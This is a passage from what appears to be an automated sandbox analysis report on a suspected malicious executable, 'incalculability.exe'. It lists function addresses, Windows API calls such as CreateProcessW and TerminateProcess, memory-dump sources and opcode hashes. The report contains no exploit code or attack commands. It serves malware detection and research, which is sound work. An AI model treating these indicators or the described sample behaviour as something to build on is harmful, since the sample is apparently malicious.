                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                            • String ID: @EXITCODE
                            • API String ID: 2734553683-3436989551
                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                            Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                            Download Yara Rule
                            Strings
                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                            • C:\Users\user\AppData\Local\inhumate\incalculability.exe, xrefs: 00410107
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _strcat
                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Local\inhumate\incalculability.exe
                            • API String ID: 1765576173-2887687278
                            • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                            • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                            Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                            • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                            Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 1794320848-0
                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                            Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Process$CurrentTerminate
                            • String ID:
                            • API String ID: 2429186680-0
                            • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                            • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                            Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                            Download Yara Rule
                            APIs
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconNotifyShell_
                            • String ID:
                            • API String ID: 1144537725-0
                            • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                            • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                            • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                            • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                            Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                            Download Yara Rule
                            APIs
                            • _malloc.LIBCMT ref: 0043214B
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • _malloc.LIBCMT ref: 0043215D
                            • _malloc.LIBCMT ref: 0043216F
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc$AllocateHeap
                            • String ID:
                            • API String ID: 680241177-0
                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                            Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                            Download Yara Rule
                            APIs
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekTranslate
                            • String ID:
                            • API String ID: 4217535847-0
                            • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                            • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                            • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                            Function 03F27BB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 03F27C0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1900399949.0000000003F25000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F25000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3f25000_incalculability.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: e9f3c6bf1166c7988bd63a796cb0a0cfd20f0fa3a81062b5847834b26c8814aa
                            • Instruction ID: 45671e2674b3a1a1f49ffb5c5ce38bc242e4885814a53f76a13bb94a1fe39fe8
                            • Opcode Fuzzy Hash: e9f3c6bf1166c7988bd63a796cb0a0cfd20f0fa3a81062b5847834b26c8814aa
                            • Instruction Fuzzy Hash: DE011D7594031DABDB20EFE0CC49FFE7B7CAF44701F408959BA159A181EA7896488BA1
                            Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                            • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                            • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                            • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                            Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                            Download Yara Rule
                            APIs
                            • __wsplitpath.LIBCMT ref: 004678F7
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ErrorLast__wsplitpath_malloc
                            • String ID:
                            • API String ID: 4163294574-0
                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                            Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                            • _strcat.LIBCMT ref: 0040F786
                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                            • String ID:
                            • API String ID: 3199840319-0
                            • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                            • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                            Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FreeInfoLibraryParametersSystem
                            • String ID:
                            • API String ID: 3403648963-0
                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                            Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                            Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            • __lock_file.LIBCMT ref: 00414A8D
                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                            • __fclose_nolock.LIBCMT ref: 00414A98
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                            Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • __lock_file.LIBCMT ref: 00415012
                            • __ftell_nolock.LIBCMT ref: 0041501F
                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2999321469-0
                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                            Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
